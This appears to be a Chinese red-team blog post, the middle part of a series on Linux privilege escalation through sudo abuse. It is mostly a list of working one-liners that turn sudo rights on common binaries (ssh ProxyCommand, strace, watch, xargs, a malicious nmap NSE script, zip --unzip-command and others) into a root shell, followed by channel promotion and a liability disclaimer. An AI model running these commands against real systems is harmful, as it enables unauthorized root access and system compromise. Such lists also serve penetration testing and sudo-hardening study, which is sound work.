红队实战:Linux 提权 —— sudo 权限滥用与绕过技巧(上篇)
2026-04-02

红队实战:Linux 提权 —— sudo 权限滥用与绕过技巧(中篇)
2026-04-08

sudo setarch $(arch) /bin/bash -p
sudo ssh -o ProxyCommand=';/bin/bash -p 0<&2 1>&2' x
sudo strace -o /dev/null /bin/bash -p
sudo stdbuf -i0 /bin/bash -p
步骤1:输入 sudo tclsh
步骤2:输入 exec /bin/bash -p <@stdin >@stdout 2>@stderr 回车跳转到 root shell

sudo time /bin/bash -p
sudo timeout 7d /bin/bash -p
sudo watch -x /bin/bash -c 'reset; exec /bin/bash -p 1>&0 2>&0'
sudo xargs -a /dev/null /bin/bash -p
sudo zsh
步骤1:输入 echo "os.execute('/bin/bash')" > /tmp/shell.nse
步骤2:输入 sudo nmap --script=/tmp/shell.nse 回车跳转到 root shell

sudo zip 2.zip 2.txt -T --unzip-command="sh -c /bin/bash"
Happy Hacking!🚀
欢迎关注我的公众号「倍果科技」,专注于红队攻防技术的前沿探索与深度分享。我们不仅定期分享红队实战的独到思路与创新打法,更将为您带来最新的0day、1day漏洞情报,助您始终站在安全技术的最前沿。
🌟 温馨提示:微信推送规则调整后,设为星标的公众号才能第一时间看到大图推送哦!
为了避免错过干货文章,请点击右上角「…」→ 选择「设为星标」⭐

📱 加入技术交流群如果你想加入我们的技术交流群,请添加我的微信号,备注「安全技术交流」,我会邀请您进入群聊。(由于群成员已满200人,无法通过扫描二维码直接加入),期待与您在技术交流群中相遇,一起碰撞思维的火花,分享安全技术的无限可能!🚀

本文章仅供学习和研究用途。请勿将文章中的技术用于任何非法活动。因使用本文提供的信息或工具所导致的任何直接或间接后果与损失,均由使用者自行承担,作者及平台对此不承担任何责任。
文章中的信息和工具均收集自互联网,使用者需自行验证其真实性与安全性。如有侵权行为,请联系以便及时删除。
再次提醒,任何非法使用与本文章作者和平台无关,责任由使用者自行承担。
往期推荐